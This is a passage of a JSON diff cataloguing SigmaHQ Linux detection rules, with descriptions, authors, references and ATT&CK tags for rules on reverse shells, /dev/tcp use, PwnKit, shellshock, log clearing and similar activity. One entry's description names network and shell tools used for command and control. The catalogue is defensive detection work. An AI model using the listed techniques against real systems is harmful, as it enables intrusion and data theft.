+ ], + "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" + }, + { + "description": "Detects password policy discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community, Pawel Mazur", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_password_policy_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://attack.mitre.org/techniques/T1201/", + "https://linux.die.net/man/1/chage", + "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ] + }, + "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "value": "Password Policy Discovery" + }, + { + "description": "Detects a reload or a start of a service.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "Installation of legitimate service.", 
+ "Legitimate reconfiguration of service." + ], + "filename": "lnx_auditd_pers_systemd_reload.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "value": "Systemd Service Reload or Start" + }, + { + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/21", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencapture_import.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "value": "Screen Capture with Import Tool" + }, + { + "description": "Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/13", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "filename": "lnx_auditd_screencaputre_xwd.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/xwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "value": "Screen Capture with Xwd" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "value": "Split A File Into Pieces - Linux" + }, + { + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + 
"Unknown" + ], + "filename": "lnx_auditd_steghide_embed_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "value": "Steganography Hide Files with Steghide" + }, + { + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_extract_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "value": "Steganography Extract Files with Steghide" + }, + { + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), 
Data Encoding (T1132)\n", + "meta": { + "author": "Marie Euler", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_susp_c2_commands.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Neo23x0/auditd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "value": "Suspicious C2 Activities" + }, + { + "description": "Detects relevant commands often related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/12/12", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_susp_cmds.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research - mostly derived from exploit code including code in MSF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "value": "Suspicious Commands Linux" + }, + { + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/23", + "falsepositive": [ + "Admin activity (especially in /tmp folders)", + "Crazy web applications" + ], + "filename": "lnx_auditd_susp_exe_folders.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" + ], + "tags": [ + "attack.t1587", + "attack.t1584", + "attack.resource_development" + ] + }, + 
"uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "value": "Program Executions in Suspicious Folders" + }, + { + "description": "Detects commandline operations on shell history files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2020/10/17", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "filename": "lnx_auditd_susp_histfile_operations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ] + }, + "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", + "value": "Suspicious History File Operations - Linux" + }, + { + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/02/03", + "falsepositive": [ + "Admin work like legit service installs." 
+ ], + "filename": "lnx_auditd_systemd_service_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "value": "Systemd Service Creation" + }, + { + "description": "Detects System Information Discovery commands", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/03", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_info_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1082/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "value": "System Information Discovery - Auditd" + }, + { + "description": "Detects system information discovery commands", + "meta": { + "author": "Ömer Günal, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_auditd_system_info_discovery2.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "value": "System and Hardware Information Discovery" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", + "value": "System Shutdown/Reboot - Linux" + }, + { + "description": "Detects extracting of zip file from image file", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": 
"edd595d7-7895-4fa7-acb3-85a18a8772ca", + "value": "Steganography Unzip Hidden Information From Picture File" + }, + { + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_user_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "value": "System Owner or User Discovery" + }, + { + "description": "Detects possible command execution by web application/web shell", + "meta": { + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Admin activity", + "Crazy web applications" + ], + "filename": "lnx_auditd_web_rce.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "Personal Experience of the Author", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "value": "Webshell Remote Command Execution" + }, + { + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/09", + "falsepositive": [ + "Unknown" + ], + 
"filename": "lnx_apt_equationgroup_lnx.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059.004" + ] + }, + "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "value": "Equation Group Indicators" + }, + { + "description": "Detects buffer overflow attempts in Unix system log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/01", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_buffer_overflows.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" + ], + "tags": [ + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", + "value": "Buffer Overflow Attempts" + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/09/10", + "falsepositive": [ + "Log rotation" + ], + "filename": "lnx_clear_syslog.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ] + }, + "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", + "value": "Commands to Clear or Remove the Syslog - Builtin" + }, + { + 
"description": "Detects suspicious modification of crontab file.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/04/16", + "falsepositive": [ + "Legitimate modification of crontab" + ], + "filename": "lnx_crontab_file_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ] + }, + "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "value": "Modifying Crontab" + }, + { + "description": "Detects the use of tools that copy files from or to remote systems", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/18", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "lnx_file_copy.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1105/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", + "value": "Remote File Copy" + }, + { + "description": "Detects the ld.so preload persistence file. 
See `man ld.so` for more information.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/05", + "falsepositive": [ + "Rare temporary workaround for library misconfiguration" + ], + "filename": "lnx_ldso_preload_injection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://man7.org/linux/man-pages/man8/ld.so.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" + ] + }, + "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "value": "Code Injection by ld.so Preload" + }, + { + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/05/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/Immersive-Labs-Sec/nimbuspwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "value": "Nimbuspwn Exploitation" + }, + { + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "meta": { + "author": "Sreeman", + "creation_date": "2022/01/26", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + 
"https://twitter.com/wdormann/status/1486161836961579020", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.001" + ] + }, + "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "value": "PwnKit Local Privilege Escalation" + }, + { + "description": "Detects shellshock expressions in log files", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shellshock.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "value": "Shellshock Expression" + }, + { + "description": "Clear command history in linux which is used for defense evasion.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/03/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_clear_cmd_history.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://attack.mitre.org/techniques/T1070/003/", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "value": "Clear Command History" + }, + { + "description": "Detects suspicious shell commands indicating the information 
gathering phase as preparation for the Privilege Escalation.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/05", + "falsepositive": [ + "Troubleshooting on Linux Machines" + ], + "filename": "lnx_shell_priv_esc_prep.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", + "value": "Privilege Escalation Preparation" + }, + { + "description": "Detects suspicious shell commands used in various exploit codes (see references)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_commands.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", + "https://artkond.com/2017/03/23/pivoting-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", + "value": "Suspicious Activity in Shell Commands" + }, + { + "description": "Detects suspicious log entries in Linux log files", + "meta": { + 
"author": "Florian Roth", + "creation_date": "2017/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_log_entries.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_log_entries.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "value": "Suspicious Log Entries" + }, + { + "description": "Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/02", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_shell_susp_rev_shells.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://alamot.github.io/reverse_shells/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_rev_shells.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "738d9bcf-6999-4fdb-b4ac-3033037db8ab", + "value": "Suspicious Reverse Shell Command Line" + }, + { + "description": "Detects space after filename", + "meta": { + "author": "Ömer Günal", + "creation_date": "2020/06/17", + "falsepositive": [ + "Typos" + ], + "filename": "lnx_space_after_filename_.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1064", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_space_after_filename_.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "879c3015-c88b-4782-93d7-07adf92dbcb7", + "value": "Space After Filename" + }, + { + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", + "meta": { + "author": "Florian Roth", + "creation_date": 
"2019/10/15", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_sudo_cve_2019_14287_user.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.openwall.com/lists/oss-security/2019/10/14/1", + "https://access.redhat.com/security/cve/cve-2019-14287", + "https://twitter.com/matthieugarin/status/1183970598210412546", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ] + }, + "uuid": "7fcc54cb-f27d-4684-84b7-436af096f858", + "value": "Sudo Privilege Escalation CVE-2019-14287 - Builtin" + }, + { + "description": "Detects suspicious command with /dev/tcp", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_dev_tcp.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/", + "https://book.hacktricks.xyz/shells/shells/linux", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_dev_tcp.yml" + ], + "tags": [ + "attack.reconnaissance" + ] + }, + "uuid": "6cc5fceb-9a71-4c23-aeeb-963abe0b279c", + "value": "Suspicious Use of /dev/tcp" + }, + { + "description": "Detects suspicious command sequence that JexBoss", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_susp_jexboss.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.us-cert.gov/ncas/analysis-reports/AR18-312A", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_susp_jexboss.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ] + }, + "uuid": "8ec2c8b4-557a-4121-b87c-5dfb3a602fae", + "value": "JexBoss Command Sequence" + }, + { + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/04/05", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_symlink_etc_passwd.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.qualys.com/2021/05/04/21nails/21nails.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_symlink_etc_passwd.yml" + ], + "tags": [ + "attack.t1204.001", + "attack.execution" + ] + }, + "uuid": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "value": "Symlink Etc Passwd" + }, + { + "description": "Detects the creation of doas.conf file in linux host platform.", + "meta": { + "author": "Sittikorn S, Teoderick Contreras", + "creation_date": "2022/01/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_create_lnx_doas_conf_creation.yml", + "level": "medium", + "logsource.category": "file_create", + "logsource.product": "linux", + "refs": [ + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", + "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "00eee2a5-fdb0-4746-a21d-e43fbdea5681", + "value": "Linux Doas Conf File Creation" + }, + { + "description": "Detects creation of cron file or files in Cron directories which could indicates potential persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": 
